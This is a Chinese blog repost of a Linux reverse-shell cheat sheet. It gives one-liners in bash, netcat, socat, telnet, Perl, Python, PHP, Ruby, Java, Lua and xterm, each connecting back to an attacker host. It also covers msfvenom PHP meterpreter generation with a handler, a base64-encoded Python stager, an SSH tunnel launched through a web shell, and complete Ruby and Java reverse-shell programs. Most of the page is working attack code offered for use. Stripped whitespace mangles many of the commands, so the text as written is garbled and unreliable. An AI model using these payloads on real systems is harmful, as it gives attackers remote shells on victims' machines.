您的位置：首页 > 运维架构 > Shell

linux反弹shell

2016-10-09 10:11 579 查看

参考链接

http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.htmlhttp://www.waitalone.cn/linux-shell-rebound-under-way.htmlhttp://roo7break.co.uk/?p=215http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheethttp://www.91ri.org/9367.htmlhttp://www.tuicool.com/articles/3uQ3ue

拓展阅读

linux设置启动执行命令：http://www.cnblogs.com/ssooking/p/6094740.html

反弹IP：10.0.0.1

监听端口：1234

Bash

[shell有时由bash解析有时由sh解析，不一定百发百中]

bash-i>&/dev/tcp/10.0.0.1/12340>&1

注：/dev/[tcp|upd]/host/port是Linux设备里面的特殊文件，读取或写入相当于建立socket调用
"&"在Linuxshell中表示后台运行

但这里0>&1不是这样，对于&1更准确的说应该是文件描述符1。而1一般代表的就是STDOUT_FILENO***
2>&1形式用于重定向，2>表示错误重定向，&1表示标准输出；
以ls>/dev/null2>&1为例：2>&1是将标准出错重定向到标准输出，在这里又被重定向到了/dev/null里

补充：http://www.cnblogs.com/hokyhu/archive/2011/09/27/2193489.html

Netcat

　不同版本的nc不一定支持-e选项
　nc-ecmd.exe10.0.0.11234　　
　nc-e/bin/sh10.0.0.11234

nc不使用-e
Hacker:nc-lvnp1234
Victim:mknod/tmp/backpipep
Victim:/bin/sh0</tmp/backpipe|nc10.0.0.112341>/tmp/backpipe

不使用nc
Method1:
Hacker:nc-nvlpp1234
Victim:/bin/bash-i>/dev/tcp/10.0.0.1/12340<&12>&1

Method2:
Hacker:nc-nvlpp1234
Victim:mknodbackpipep&&telnet10.0.0.112340backpipe

Method3:
Hacker:nc-nvlpp8080
Hacker:nc-nvlpp8888
Victim:telnet10.0.0.11234|/bin/bash|telnet10.0.0.11234

Method4:
rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i2>&1|nc10.0.0.11234>/tmp/f

Method5:
nc10.0.0.11234|/bin/sh|ncx.x.x.x2444

socat

socattcp-connect:转发到某个主机的IP:端口exec:'bash-li',pty,stderr,setsid,sigint,sane

socat是个非常强大的工具，跑个题，补充几个用法

连接远程端口 nclocalhost80 socat-TCP:localhost:80 监听端口 nc-lplocalhost700 socatTCP-LISTEN:700- 正向shell nc-lplocalhost700-e/bin/bash socatTCP-LISTEN:700EXEC:/bin/bash SSL连接 SSL服务器:socatOPENSSL-LISTEN:443,cert=/cert.pem- 需要首先生成证书文件 SSL客户端:socat-OPENSSL:localhost:443 fork服务器可以将一个使用标准输入输出的单进程程序变为一个使用fork方法的多进程服务不同设备的通信将U盘进行网络共享：socat-d-d/dev/ttyUSB1,raw,nonblock,ignoreeof,cr,echo=0TCP4-LISTEN:5555,reuseaddr　　-d-d指的是调试信息的级别将终端转发到COM1：socatREADLINE,history=$HOME/.cmd_history/dev/ttyS0,raw,echo=0,crnl socat还有个readbyte的option，可以当dd用了。

　　

PERL

perl-e'useSocket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh-i");};' 不依赖bin/bash perl-MIO-e'$p=fork;exit,if($p);$c=newIO::Socket::INET(PeerAddr,"10.0.0.1:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_while<>;'

Python

python-c'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' python-c"exec(\"importsocket,subprocess;s=socket.socket();s.connect(('10.0.0.1',1234))\nwhile1:proc=subprocess.Popen(s.recv(1024),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"

Metasploit版的python代码：

#msfvenom-fraw-ppython/meterpreter/reverse_tcpLHOST=192.168.90.1LPORT=1234
importbase64;exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMTkyLjE2OC45MC4xJywxMjM0KSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1zLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6c30pCg=='))

base64解码后：

importsocket,struct
s=socket.socket(2,1)
s.connect(('192.168.90.1',1234))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(4096)
whilelen(d)!=l:
d+=s.recv(4096)
exec(d,{'s':s})

PHP

php-r'$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh-i<&3>&32>&3");'#代码假设TCP连接的文件描述符为3，如果不行可以试下4,5,6

Ruby

ruby-rsocket-e'f=TCPSocket.open("10.0.0.1",1234).to_i;execsprintf("/bin/sh-i<&%d>&%d2>&%d",f,f,f)'
不依赖于/bin/sh：ruby-rsocket-e'exitiffork;c=TCPSocket.new("10.0.0.1","1234");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.printio.read}end'
目标是windows：ruby-rsocket-e'c=TCPSocket.new(10.0.0.1","1234");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.printio.read}end'　

Java

r=Runtime.getRuntime()
p=r.exec(["/bin/bash","-c","exec5<>/dev/tcp/10.0.0.1/1234;cat<&5|whilereadline;do\$line2>&5>&5;done"]asString[])
p.waitFor()

msf：usepayload/java/shell/reverse_tcp

Telnet

rm-f/tmp/p;mknod/tmp/pp&&telnet10.0.0.112340/tmp/p
或者
mknodbackpipep&&telnet10.0.0.112340<backpipe|/bin/bash1>backpipe

lua

lua-e"require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh-i<&3>&32>&3');"

msf反弹：usepayload/cmd/unix/reverse_lua

Xterm

首先开启Xserver：　　　　　　　　　　　　#TCP6001
Xnest:1　　　　　　　#Note:ThecommandstartswithuppercaseX

授予目标机连回来的权限：
xterm-display127.0.0.1:1#RunthisOUTSIDEtheXnest,anothertab
xhost+targetip#RunthisINSIDEthespawnedxtermontheopenXServer

如果想让任何人都连上：
xhost+　　　　#RunthisINSIDEthespawnedxtermontheopenXServer

假设xterm已安装，连回你的Xserver：
xterm-displayattackerip:1　或者：$DISPLAY=attackerip:0xterm

msfvenom生成web反弹shell

msfvenom-pphp/meterpreter/reverse_tcpLHOST=192.168.1.2LPORT=1234-fraw>test.php
生成后要将脚本最前面的注释符去掉，然后上传到目标服务器上
启动msf

useexploit/multi/handler
setPAYLOADphp/meterpreter/reverse_tcp
setLHOSTIP
setLPORTport
exploit-j

然后从浏览器中访问上传的脚本http://xxx.com/test.php，即可获得shell

#反弹sshshell

$wget-O--q"http://www.test.com/sh.php?cmd=ssh-i/tmp/id_rsa-oStrictHostKeyChecking=no-R127.0.0.1:8080:192.168.20.13:8080-N-fusername@<attacker_ip>"

　　

一些msf模块里面的长脚本

Ruby

#!/usr/bin/envruby

require'socket'
require'open3'

#SettheRemoteHostIP
RHOST="192.168.1.10"
#SettheRemoteHostPort
PORT="6667"

#Triestoconnectevery20secuntilitconnects.
begin
sock=TCPSocket.new"#{RHOST}","#{PORT}"
sock.puts"Weareconnected!"
rescue
sleep20
retry
end

#Runsthecommandsyoutypeandsendsyoubackthestdoutandstderr.
begin
whileline=sock.gets
Open3.popen2e("#{line}")do|stdin,stdout_and_stderr|
IO.copy_stream(stdout_and_stderr,sock)
end
end
rescue
retry
end

　　

JAVA

importjava.io.*;
importjava.net.Socket;
importjava.util.*;
importjava.util.regex.*;
importjava.applet.Applet;

publicclasspocextendsApplet{
/**
*Author:danielbaieraliasduddits
*Licens:GPL
*Requirements:JRE1.5forrunningandtheJDK1.5forcompilingorhigher
*Version:0.1alpharelease
*/

publicStringcd(Stringstart,FilecurrentDir){
FilefullPath=newFile(currentDir.getAbsolutePath());
Stringsparent=fullPath.getAbsoluteFile().toString();
returnsparent+"/"+start;

}

@SuppressWarnings("unchecked")
publicvoidinit(){
pocrs=newpoc();
PrintWriterout;
try{
SocketclientSocket=newSocket("192.168.5.222",10003);
out=newPrintWriter(clientSocket.getOutputStream(),true);
out.println("\tJRS0.1alpharelease\n\tdevelopedbydudditsaliasdanielbaier");
booleanrun=true;
Strings;
BufferedReaderbr=newBufferedReader(newInputStreamReader(clientSocket.getInputStream()));
Stringstartort="/";
while(run){
Stringz1;
Filef=newFile(startort);
out.println(f.getAbsolutePath()+">");
s=br.readLine();
z1=s;
Patternpcd=Pattern.compile("^cd\\s");
Matchermcd=pcd.matcher(z1);
String[]teile1=pcd.split(z1);
if(s.equals("exit")){
run=false;
}elseif(s.equals(null)||s.equals("cmd")||s.equals("")){

}elseif(mcd.find()){
try{
Stringcds=rs.cd(teile1[1],newFile(startort));
startort=cds;
}catch(Exceptionverz){
out.println("Path"+teile1[1]
+"notfound.");
}

}else{

Stringz2;

z2=s;
Patternpstring=Pattern.compile("\\s");
String[]plist=pstring.split(z2);

try{

LinkedListslist=newLinkedList();
for(inti=0;i<plist.length;i++){
slist.add(plist[i]);
}

ProcessBuilderbuilder=newProcessBuilder(slist);
builder.directory(newFile(startort));
Processp=builder.start();
Scannerse=newScanner(p.getInputStream());
if(!se.hasNext()){
Scannersa=newScanner(p.getErrorStream());
while(sa.hasNext()){
out.println(sa.nextLine());
}
}
while(se.hasNext()){
out.println(se.nextLine());
}

}catch(Exceptionerr){
out.println(f.getAbsolutePath()+">Command"
+s+"failed!");
out.println(f.getAbsolutePath()+">Pleasetrycmd/c"+s+"orbash-c"+s+"ifthiscommandisanshellbuildin.");
}

}
}

if(!clientSocket.isConnected()){
run=false;
out.flush();
out.close();
}

}catch(Exceptionio){
//System.err.println("Connectionrefusedbypeer");
}

}

}

　　

内容来自用户分享和网络整理，不保证内容的准确性，如有侵权内容，可联系管理员处理

标签：

相关文章推荐

新的分享

章节导航